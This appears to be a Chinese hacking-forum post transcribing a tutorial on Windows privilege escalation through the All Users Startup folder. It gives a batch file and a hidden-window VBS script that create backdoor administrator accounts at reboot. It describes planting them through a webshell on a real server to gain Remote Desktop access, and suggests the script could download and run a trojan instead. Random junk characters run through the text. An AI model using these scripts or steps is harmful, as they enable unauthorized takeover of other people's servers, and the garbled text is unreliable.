3AST提权课程之启动项提权
大家好,我是完美蚂蚁 今天给大家带来的提权教程是0DZ4S0}KE(^+b$kCsh启动 提权\riZ Vu$y
C:\Docume~1\All Users\「开始」菜单\程序\启动
在这里必须有写入权限 否则此方法无效
因为我是在网吧 这里显示不了路径#o^ n1S.dO
我去服务器上演示给大家看
大家看到了把 就是这个路径 在这个里面写入文件 等候服务器从起 就会自动执行我们的
文件 从而运行我们的文件
这里有两中方式 第一种是批处理'I:~$N(H#Q:o5D_
我们来看下目前 我机器上的用户组
目前我们没有521这个用户
看到了把 已经添加到管理组中去了 刚才我们运行程序的时候 一闪而过一个黑色提示
大家看到了吧 如果是在服务器上运行 一样会有这个提示的 细心的管理员有可能发现+c3S{.J2]}M&AT'd2C
下面我们来介绍第二中方法使用VBS脚本 大家都知道VBS脚本是没有这个提示的
大家看 已经成功加入了WMMY用户
网络实战才是我们练手的目的 我已经找到一个含有这种漏洞的WBESHELL了 yWwlB9f0B/\L
当前终端服务端口: 3389
系统自动登录功能未开启
3389 已经打开了 我们只需要拥有一个管理员权限的用户就可以了*f*`0ruC
C:\Docume~1\All Users\「开始」菜单\程序\启动 这个是默认的路径5uh9c3x8u8P)rq_u
第一种隐蔽性太差 我们就用第二种吧V{Nn5x2Fc
已经写入了 我们只需要等待服务器从起 那个VBS脚本文件就会把我们的用户加入进去H4a%r+~a0^ tTG
从而取得了3389的登陆权限
其实在VBS脚本中 我们不一定需要添加管理员帐户可以 直接让VBS下载运行我们的木马
基本原理都差不多 我就不多介绍了
教程结束```
@echo offk&U#@5F1pd^9~'[b.g
net user 521 521 /addy3a-eE5}a2u2@*|
net localgroup administrators 521 /add
on Error Resume next
set wshshell=createobject("wscript.shell")9Y0R"~8]Y g
a=wshshell.run("net user wmmy$ 1227 /add",0)
a=wshshell.run("net localgroup administrators wmmy$ /add",0)5|h9\~@t3M yQ
[url=http://www.namipan.com/d/5a1c90d3c0c7bfdbdd39841576ba4a153844b7d9fe5e6100][size=5]点击下载[/size],~1o8skUp
[/url] 不建议是用纳米~~很垃圾~。 +个分 能要是管理的权限啊~。 写的不错哦~~~~~-f.f1DH/Y'O |
#m!LYEL~
昨天有事情没有上了 顶下~一下加这么多啊~BS下~:lol 顶下小柔
看看~;P
页:
[1]